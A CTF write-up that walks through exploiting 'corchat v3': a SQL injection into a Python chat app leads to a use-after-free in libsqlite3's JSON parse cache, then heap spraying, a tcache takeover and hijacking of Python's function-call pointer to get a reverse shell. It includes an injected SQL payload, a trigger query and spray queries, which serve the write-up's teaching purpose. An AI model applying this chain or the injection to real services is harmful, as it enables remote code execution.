corchat v3
was one of the (many) brainfuck pwn challenges from this CTF, and was the challenge I focused on during the event (gotta get that $50). Unfortunately I didn't solve it during the event, and someone beat me to it anyways. I did however manage to figure out most of how it worked after the event (with some reference to the author's solution). Anyway, let's jump in.
As the name implies, the target is a chatting application, which we're given the following source code for:
The app is fairly simple:
- A user can send a message (handled by `handle_new_message`), which is stored to a sqlite database using an `INSERT` statement.
- A user connecting to the server (handled by `handle_new_connection`) will receive all the messages currently in the database.
The first vulnerability is fairly easy to spot:
When inserting the message into the database, it's interpolated directly into the statement using string formatting, instead of something like a prepared statement, without checking the contents of the message or escaping problematic characters. This is a classic SQL injection.
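To illustrate the pattern (a sketch, not the app's actual code — the handler name comes from the source above, the body and table layout are assumptions):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE messages (content TEXT)")

def handle_new_message_vulnerable(msg):
    # The message is interpolated straight into the SQL text -- injection.
    # (executescript is used here so the stacked statement actually runs.)
    conn.executescript(f"INSERT INTO messages VALUES ('{msg}')")

# A crafted message closes the string literal and smuggles in extra SQL;
# the trailing comment swallows the leftover quote.
handle_new_message_vulnerable("hi'); SELECT length('pwn'); --")

# The safe version binds the message as a parameter instead.
conn.execute("INSERT INTO messages VALUES (?)", ("hi'); not sql anymore",))
```

With parameter binding the second "payload" is stored verbatim as data; with string formatting the first one executed an attacker-chosen statement.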
Unfortunately we can't use it for an RCE in this case, and it's not like the flag (or anything useful) is in the database. So what on earth is this useful for?
The app is written in python, so it's not like the app itself can have any memory corruption bugs either, so what gives? Isn't this meant to be a pwn challenge???
Well, upon closer inspection of the `Dockerfile`, we notice something interesting.
While most of the installs are normal, this one stands out, because it's compiling its own very specific version of `libsqlite3` from a commit hash. So, what if there was a vulnerability in this version of `libsqlite3`? The python library wouldn't be implementing all the logic itself; it would reuse existing code from libraries like `libsqlite3`, so a vulnerability there would also be a vulnerability in python's `sqlite3` module, and thus in our application. And since we have SQL injection, we can pass arbitrary SQL commands, giving us a decent amount of control in this hypothetical attack scenario.
Let's first look at this commit:
Having a brief look at the current commit didn't ring any alarm bells. But what if there was a vulnerability that was reported and fixed in a later commit? Scrolling up to the next commit reveals something very appealing:
A potential UAF you say :eyes:. Commit faef28e6bd654e5061561423cb1ece6ca84f1f1f includes a patch for the issue:
At first glance, one can assume that there's a UAF occurring due to the `pParse` object's reference count not being incremented, causing it to be incorrectly freed. But what is this talk about a JSON parser cache spill?
We've also been given some test cases which would supposedly trigger the bug:
Let's try them out in the docker.
And that right there, is the pwn we've been looking for.
So at the moment we know there's a UAF in the `json_set` and `json_replace` functions, but what are these functions?
- `json_set` takes a JSON object and key-value pairs, and assigns each pair to the JSON object (`json[key] = value`).
- `json_replace` is similar, but only sets the value if the key already exists in the object.
From what I could see, there doesn't seem to be a proper JSON object type in sqlite, rather they take and return strings representing JSON objects, which you can see in the test cases as well. This means they need to parse the JSON string every time it's used.
For this writeup we'll focus on `json_set`, but note that you could most likely also do this challenge using `json_replace` (or `json_insert`).
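Neither function needs the vulnerable build to demonstrate, so here's a quick look at their behaviour through python's `sqlite3` module (assuming your sqlite has the JSON1 functions compiled in):

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# json_set assigns the pair whether or not the key exists...
print(conn.execute("SELECT json_set('{\"a\":1}', '$.b', 2)").fetchone()[0])
# -> {"a":1,"b":2}

# ...while json_replace only touches keys that already exist.
print(conn.execute("SELECT json_replace('{\"a\":1}', '$.b', 2)").fetchone()[0])
# -> {"a":1}
```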
`json_set` is implemented by `jsonSetFunc` (bet you didn't see that coming).
We see that a function called `jsonParseCached` is used to generate the `pParse` object we saw earlier. Based on the name, we can assume it parses the JSON string, but also keeps a cache to speed up parsing, which makes sense, as a JSON string has to be parsed each time it's used. The bug description also mentioned a cache spill/overflow, so I wonder if this has anything to do with it. Foreshadowing is a literary device in wh-
After parsing the JSON it pretty much does what you'd expect:
- Look up the key to get the value `pNode` (if it doesn't exist, a null slot is allocated by `jsonLookup`).
- The value `pNode` is replaced by the new value with `jsonReplaceNode`.
You may have also noticed the `bIsSet ? "set" : "insert"`, which is because this function also implements `json_insert`. We don't need to worry about the extra logic that this brings, as we don't use it here.
This is the type of the object `pParse`, which represents a parsing of the JSON string, not the typical JSON object you might be picturing with a list of key-value pairs or a hash table. Think of it more like an AST (Abstract Syntax Tree).
It stores the JSON string that the parse came from and a list of nodes in `aNode`, which can have multiple types:
- OBJECT/ARRAY: These refer to `{}`/`[]` respectively, and store the total number of nodes contained in the object/array, which directly follow this node.
- STRING/INT/REAL: These contain pointers into the main JSON string referring to the string/int/real, plus the length.
- NULL: Represents a `null`.
`jsonParseCached` is a bit confusing at first, because there's a lot of logic relating to caching that we don't need to worry about too much (particularly regarding whether the JSON is allowed prior edits), so I'll just cover the essentials.
Since an sqlite object is passed, we need to extract the raw `char*` into `zJson` and the size into `nJson`.
Then it iterates through all the possible entries in the JSON parser cache. sqlite stores these in a singly linked list along with other auxiliary data allocations (accessed via `sqlite3_get_auxdata`). Since they're lumped in with other types of allocations, they're uniquely identified by giving them a set of keys that are only used by JSON parse objects, starting at `JSON_CACHE_ID` and spanning `JSON_CACHE_SZ` (4) keys.
If a slot is missing, it's marked using `iMinKey`, which is used later as the slot to store a new `JsonParse` object.
A slot can also be marked via `iMinKey` if its entry has been in the cache too long. This is implemented using a number, `iHold`, stored in each object: the object with the lowest `iHold` will be evicted, and new objects are given an `iHold` higher than that of any currently cached item.
It's easier to think of it like a FIFO queue: an object is inserted into the cache, and as more objects are inserted, the original one is pushed to the end, where it's eventually dequeued to make room for the next one.
A JSON string is typically matched to a cache entry by comparing the JSON strings using `memcmp`. There is more logic relating to this, but it's not that important for our purposes here.
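The caching behaviour above can be modelled in a few lines of python (a toy model; `JSON_CACHE_SZ` and `iHold` mirror names from sqlite's `src/json.c`, everything else is illustrative):

```python
JSON_CACHE_SZ = 4  # number of cache slots, as in sqlite's json.c

class JsonCache:
    """Toy model of sqlite's JSON parse cache: FIFO eviction via iHold."""
    def __init__(self):
        self.slots = {}  # json_text -> iHold

    def get(self, text):
        if text in self.slots:
            return f"cached parse of {text!r}"
        if len(self.slots) >= JSON_CACHE_SZ:
            # Evict the entry with the lowest iHold (the oldest) -- in the
            # real code this frees the JsonParse, which is where the UAF lives.
            oldest = min(self.slots, key=self.slots.get)
            del self.slots[oldest]
        # New entries get an iHold above every currently cached item.
        self.slots[text] = max(self.slots.values(), default=0) + 1
        return f"new parse of {text!r}"

cache = JsonCache()
cache.get("{}")             # '{}' enters the cache first...
for t in ("1", "2", "3", "4"):
    cache.get(t)            # ...and four newer entries push it out
assert "{}" not in cache.slots
```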
Above is how a new `JsonParse` object is created if a cached one couldn't be found. While most of this isn't too important, there are some details which are interesting to note:
- Line 1959: The reference count is set to 1.
- Line 1963: This is the case where `jsonParse` failed, and there's a comment that the caller will own the new `JsonParse` object. If that's what happens in the case of an error, what happens normally?
- Line 1971: We see that it's actually the cache that owns the object, not the caller. Hmmm...
- Line 1972: The object is stored to the cache using `sqlite3_set_auxdata`, at `iMinKey`, with the destructor `jsonParseFree`. If it's replacing an entry that already exists, the existing entry is freed using its destructor.
The destructor in question behaves how you might expect:
If the reference count is greater than 1, it's decremented; otherwise this was the last reference, so the object is freed.
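In python-flavoured pseudocode (a simplification of the destructor's logic; the field name `nJPRef` matches the sqlite source, the rest is illustrative):

```python
class JsonParse:
    def __init__(self):
        self.nJPRef = 1  # reference count; the cache holds the only ref

def json_parse_free(p):
    # Someone else still holds a reference: just drop ours.
    if p.nJPRef > 1:
        p.nJPRef -= 1
        return False  # not freed
    # Last reference: free the object. In jsonSetFunc's case nJPRef is
    # still 1 at eviction time, so the object is freed even though the
    # function is still using it -- the UAF.
    return True  # freed

p = JsonParse()
assert json_parse_free(p) is True  # refcount 1 -> freed immediately
```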
This idea of the cache owning the object is also elaborated on in a comment above:
And if you remember the patch, it was `jsonSetFunc` incrementing the reference count itself, effectively also taking ownership of the object. So clearly something went wrong with this idea, and they seemingly had to backtrack a bit to fix it.
So to summarise:
- `JsonParse` objects are cached in a queue of size 4.
- It will attempt to find a cached entry before making a new one.
- If one cannot be found, a new one will be made.
- This new one is added to the queue, potentially forcing another existing entry out of the queue, causing it to be freed.
- All entries belong to the cache and have a reference count of 1, which is unchanged by `jsonSetFunc` and `jsonReplaceFunc`.
Let's have a closer look at how the value node is replaced in `json_set`. Remember that `jsonSetFunc` uses `jsonLookup` (the exact details of how this works aren't important) to find the node for the value corresponding to the key; if the key doesn't already exist, it allocates a NULL node for the value of this new key and uses that.
Replacing a node basically works by allocating a SUBST node that references the node to be replaced, but the details of this aren't necessary here. Then there's a switch case on the type of the sqlite object, so each type can be handled separately. Let's look at the TEXT case.
There's a lot going on here, but it really comes down to 2 separate cases:
- `sqlite3_value_subtype(pValue) != JSON_SUBTYPE`
- `sqlite3_value_subtype(pValue) == JSON_SUBTYPE`
What does it mean for a `pValue` to have `JSON_SUBTYPE`? Well, while there isn't a JSON object type per se, there is a distinction for strings that came from JSON functions like `json`, `json_set` etc. These are marked as having the subtype `JSON_SUBTYPE` by `jsonReturnJson`, which is used by most of the JSON-related functions.
So for example the string `"hello world"` would not be considered a JSON subtype, but `json("hello world")` would. And if you remember the test cases once again, they used strings in calls to `json`. Why is that important?
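You can actually see the subtype distinction from the outside, because `json_set` embeds plain strings and JSON-subtype values differently (run on a patched sqlite with the JSON1 functions):

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# A plain TEXT value is quoted into the result as a JSON string...
plain = conn.execute("SELECT json_set('{}', '$.a', '[1,2]')").fetchone()[0]
print(plain)   # {"a":"[1,2]"}

# ...but the same text passed through json() carries JSON_SUBTYPE,
# so json_set splices it in as a real array.
subbed = conn.execute("SELECT json_set('{}', '$.a', json('[1,2]'))").fetchone()[0]
print(subbed)  # {"a":[1,2]}
```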
Well, if we have a closer look at the `JSON_SUBTYPE` case:
There's a call to `jsonParseCached`, which would make sense, considering that it expects this to be a JSON string. Harmless, right?
Well, let's go back to `jsonParseCached`. We know that it either returns a `JsonParse` from the cache, or creates a new one and adds it to the cache. Either way, a `JsonParse` from `jsonParseCached` will belong to the cache. That includes the original `JsonParse` all the way back in `jsonSetFunc`.
We also know that `jsonParseCached` can push old objects out of the cache, causing them to be freed using `jsonParseFree`. This could also include the original `JsonParse` from `jsonSetFunc`!
On its own that wouldn't be a problem, but since the object belongs only to the cache, `jsonParseFree` sees a reference count of 1, believes nothing else is using it (only the cache is), and frees it. But of course it is still in use, in `jsonSetFunc`, so this causes a UAF!
Walking this through with the (slightly modified) test case:
- All the `json` function calls are evaluated. These just return the strings themselves, but marked as `JSON_SUBTYPE`. (They are parsed and cached, but this doesn't affect much, except clearing the previous cache contents.)
- The `'{}'` is parsed and cached by `jsonParseCached`, placing it at the back of the queue.
- The `'$.a'` key is looked up, and the `null` value is replaced by `'1'`. Since it has `JSON_SUBTYPE`, it's parsed and cached, pushing `'{}'` 1 slot along.
- Repeat for `'$.b'` and `'$.c'`.
- By now, the original `'{}'` is at the end of the queue, so when `'4'` is parsed and cached, it forces `'{}'` to be dequeued and freed, resulting in a UAF.
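Following the walkthrough above, the trigger is a `json_set` whose value arguments are all `json()` calls — enough of them to cycle the 4-slot cache. On a patched sqlite this just evaluates normally; on the vulnerable commit it crashes:

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Each json(...) value is re-parsed and cached inside jsonSetFunc, so by
# the 4th one the cached parse of '{}' has been evicted (and, on the
# vulnerable libsqlite3, freed while still in use).
trigger = """
SELECT json_set('{}',
    '$.a', json('1'),
    '$.b', json('2'),
    '$.c', json('3'),
    '$.d', json('4'))
"""
print(conn.execute(trigger).fetchone()[0])  # {"a":1,"b":2,"c":3,"d":4}
```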
Right now we have the DoS the description mentioned; now for the RCE. But how?
Well first we need to control what happens right after the UAF is created to prevent a crash. So what happens next?
Well, after parsing the value that needs to be added to the object, it needs to then add the nodes corresponding to that value. It does this with `jsonParseAddNodeArray`.
Remember that at this point, the `pParse` object has been freed, which corrupts some of the first fields of the object, depending on what bin it was freed to. By debugging, we can verify that it (usually) gets freed to tcache.
I debugged it by following these steps:
- Run `python` or `python app.py`
- Run `gdbserver :9090 --attach $(pidof python3)` in another shell
- Run `gdb`, then `target remote 127.0.0.1:9090`, in yet another shell
Here we see it's been freed specifically to `tcachebins[0x60]`, which makes sense since we're on glibc 2.31, plus the size of the `JsonParse` structure is 0x50 bytes (+ a few more from storing `'{}'`). And from the structure dump, we see that the tcache key (a pointer to `tcache_perthread_struct`) overlaps with `aNode`, which is a pointer to the list of nodes making up the `JsonParse`.
This is interesting, because now we're in `jsonParseAddNodeArray`, which is about to copy a new set of nodes to `aNode` if there's room, and if there isn't, it will `realloc` it.
Theoretically this could allow arbitrary control over `tcache_perthread_struct`, but there are a few problems currently:
1. An array of `JsonNode`s isn't very good for controlling data, as we don't have much control over their contents. Not only is it bad for arbitrary control, but by clobbering `tcache` it'll likely cause a crash in some later `malloc` call.
2. `realloc`'ing `tcache` to a smaller size also clobbers it, as a new size field will show up in the middle of `tcache`.
3. `nNode` and `nAlloc` are also overwritten by the `fd` pointer, so if there's a pointer overlapping them, these fields will be very large and likely result in a crash.
The 3rd problem can be fixed by using a spray to empty `tcachebins[0x60]` beforehand; that way the `fd` field will be `NULL`.
The 1st and 2nd problems we can solve by `realloc`'ing with a size larger than 0x290 (the size of `tcache_perthread_struct`). If a `realloc` call is passed a size larger than the current size of the chunk, and can't expand forward, it'll resort to just:
- `malloc`'ing a new, larger chunk.
- Copying over the data to the new chunk.
- `free`'ing the old chunk.
This would allow us to perform a House of Spirit attack on `tcache_perthread_struct`, and if we could allocate on top of that with controlled data, we can get an arbitrary write.
For this we'd need a way of spraying controlled data, and this is where I started to struggle, as I was unable to find such a primitive. It turns out the answer was held by another JSON function.
After the CTF, I saw that ryaagard (the challenge author) revealed how they were able to spray data.
This was rather annoying, because if I just kept looking at src/json.c I probably could've found it, but oh well.
`json_extract` takes a JSON string and a key, extracts the value corresponding to the provided key, and returns it. It's implemented by `jsonExtractFunc`, and the key part that makes this possible is `jsonReturn`.
Specifically the `JSON_STRING` case: when the string contains escape sequences (signified by `jnFlags & JNODE_RAW == 0 && jnFlags & JNODE_ESCAPE != 0`), it will `malloc` a chunk that's the same length as the escaped sequence, to ensure there's no possibility of an overflow, as an escaped character is longer than the character it represents. It then goes on to unescape the sequence, making it very useful for a data spray. Although it should be noted that you can't control every single byte in a "chunk" you allocate, due to the `malloc`'ed size being larger than the unescaped size.
We can also use this to spray `tcachebins[0x60]` to empty it.
To ensure these data sprays are preserved (i.e. not freed), we can use a sequence of `SELECT json_extract(...)` statements joined by `UNION`. I tried other ways of creating these sprays, such as string concatenation, or storing them in a list, but both of these methods failed, likely because the strings would only be needed temporarily, and would thus be freed (e.g. in the concatenation of 2 strings, neither of them is needed again after the concatenation, as they make a new, longer string). It seems that `UNION` keeps them around however, perhaps because it only combines the results at the very end.
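As a sanity check of the primitive itself (not the exploit), here's `json_extract` unescaping an escaped string, plus the `UNION` shape used to keep several such allocations alive at once — the payload contents here are placeholders:

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Each \uXXXX escape (6 bytes) unescapes to 1 byte, so sqlite mallocs a
# chunk sized for the escaped form and then fills it with our bytes.
val = conn.execute(
    r"""SELECT json_extract('{"a":"\u0041\u0041\u0041\u0041"}', '$.a')"""
).fetchone()[0]
print(val)  # AAAA

# UNION keeps every spray's result (and thus its allocation) live until
# the whole statement finishes.
spray = " UNION ".join(
    rf"""SELECT json_extract('{{"a":"\u004{i}"}}', '$.a')""" for i in range(4)
)
print(sorted(r[0] for r in conn.execute(spray).fetchall()))
```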
Let's put all of this together into a POC which overwrites tcache with junk.
We start off by spraying chunks to empty:
- `tcachebins[0x60]`: This will be used for the UAF'd chunk, so we need `fd` to be `NULL`.
- `tcachebins[0x290]`: This ensures that when we free `tcache_perthread_struct`, it gets freed to tcache, which makes it easier to reallocate. We don't need to fully empty it (1 slot would work just fine), but we might as well, just to be sure we get a slot (plus nothing's stopping us).
Then we trigger the UAF using a modified version of the test case. The change is that we use a list longer than 0x29 elements, to ensure that its `aNode` array is bigger than 0x290 bytes (`sizeof(JsonNode) = 0x10`), which forces `realloc` to free `tcache_perthread_struct`.
Finally we reclaim the allocation with a dummy.
We can test this as follows:
Bingo!
Now that we have control over `tcache_perthread_struct`, what can we do with that? ASLR is in place, and turning this into a leak wouldn't be possible, so is there anything we can target? Yes there is, because thankfully the `python` binary is compiled without PIE:
So what can we target here?
Well, one idea that I had was targeting the GOT, but this doesn't work for a very annoying reason: `sqlite3_malloc`. This is a wrapper around `malloc` that does some locking and memory tracking. Part of that memory tracking is counting how many total bytes have been malloc'ed, and to do this it uses `malloc_usable_size`.
So with our allocations we have to be careful: if we use a size that's too big (like an address) we'll get a crash, because part of determining the usable size is finding whether the next chunk's prev_inuse
bit is set, so finding the next chunk based on a large size wanders into no man's land.
So the GOT is a no-go. I also considered targeting a python class method. When a class method is called, it's typically called with the first argument being the object itself (like a `thiscall`). So if we could write a command to the start of the object, then overwrite a class method with `system@plt`, we could get RCE. I didn't find a way to do this, especially since most objects are on the heap, which we can't access. And while there are some objects we can access in `_PyRuntime`, it's still not ideal, because we need a reverse shell command, which we can't fit inside 8 bytes (at offset `+0x08` is the pointer to the class object).
So I conceded and looked at ryaagard's solution, and this is what I understood of it:
The first trick employed by ryaagard was `PyMem_RawFree`.
The `PyMem_Raw` set of allocation functions use a context object to store function handlers. It first loads the handler into `rax`, and if it's one specific function (a no-op function):
Then it uses the regular `free`. Otherwise, it will jump to it, with the first argument being an object from the same context object. This is very appealing, because if we can smash this context object, then any call to it will execute an arbitrary function (like `system@plt`) with a controlled first argument (like a reverse shell). This effectively turns `PyMem_RawFree` into a constraintless one_gadget.
So we'll need 2 writes:
- Write a reverse shell command into memory.
- Smash the `PyMem_Raw` context.
Now that we have a one_gadget, we can overwrite any class method, and if it's ever called, we'll get a reverse shell. ryaagard opted to overwrite `PyFunction_Type`, which is the object representing the python function type. It stores fields, like function pointers, which handle different functionalities of `function` objects. One of these is `tp_call`, which handles calling functions. This is an ideal target, because there will be many instances where a python function is called, and it only takes one of those calls to give us a reverse shell. However, by default `tp_call` isn't actually used, so we can't just overwrite it and call it a day. Let's have a closer look:
Searching for references to `tp_call` yields `_PyObject_MakeTpCall`:
Which, as you might expect, goes on to call the function:
All seems good, so where is this (and `tp_call` in general) used? The 2 main instances I found were:
Both of which are used by `PyEval_CallObjectWithKeywords`:
In both of these cases, we can see a common thread: `_PyVectorcall_Function` is used to determine whether or not to use `tp_call`. It seems like this has to return `NULL` for python to decide to use `tp_call`, so how do we do that?
It turns out that it checks for the vectorcall feature by checking the `tp_flags` field of the class, and seeing whether the `_Py_TPFLAGS_HAVE_VECTORCALL` (`1<<11`) flag is set. If it's disabled (i.e. the flag isn't set), then it resorts to `tp_call`.
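You can observe this flag from python itself, since `tp_flags` is exposed as `__flags__` (the bit position here assumes a CPython 3.8+ build, where the vectorcall flag is bit 11):

```python
HAVE_VECTORCALL = 1 << 11  # _Py_TPFLAGS_HAVE_VECTORCALL

FunctionType = type(lambda: 0)  # the type backed by PyFunction_Type

# Functions support vectorcall, so the flag is set -- meaning tp_call is
# normally bypassed. Zeroing tp_flags in memory forces the tp_call path.
print(bool(FunctionType.__flags__ & HAVE_VECTORCALL))  # True
```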
We can determine, by looking at the `_typeobject` struct definition, that the offsets we need are:
- `0x80`: `tp_call` (= `PyMem_RawFree`)
- `0xa8`: `tp_flags` (= `0`)
We also have the problem of actually triggering `tp_call`. This is because of another snag: at the end of executing the SQL statement, like a reasonable application which wants to avoid memory leaks (lame), sqlite frees all the memory it allocated previously, including our arbitrary allocations. When freeing these, the process will abort because they're obviously malformed "chunks", so we never actually reach the python part of the thread we corrupt, meaning our corrupted data isn't used by this thread.
Fortunately, the web application is multithreaded, and all threads share the same memory, so while the current thread may abort, another thread may want to call a python function and will use our corrupted `tp_call` before the application can abort. So ideally we'd want to stall our thread from aborting, to give the application time to trigger our reverse shell.
While sqlite doesn't have any kind of `SLEEP` statement, we can use an SQL statement that takes a while to evaluate, as is commonplace in time-based SQL injections. So we can use something like the following:
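A typical sqlite stand-in for `SLEEP` (an assumption on my part — the author's exact statement may differ) is a recursive CTE that burns CPU counting:

```python
import sqlite3
import time

conn = sqlite3.connect(":memory:")

# sqlite has no SLEEP, so a recursive CTE that counts to a few million
# is the usual stall -- bump the bound to stall for longer.
stall = """
WITH RECURSIVE c(x) AS (
    SELECT 1 UNION ALL SELECT x + 1 FROM c WHERE x < 1000000
)
SELECT count(x) FROM c
"""
t0 = time.time()
print(conn.execute(stall).fetchone()[0])  # 1000000
print(f"took {time.time() - t0:.2f}s")
```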
So, putting all of this together, we can finally produce the following exploit:
To receive the reverse shell I chose to spin up a digitalocean instance and set up a netcat listener. Let's fire away!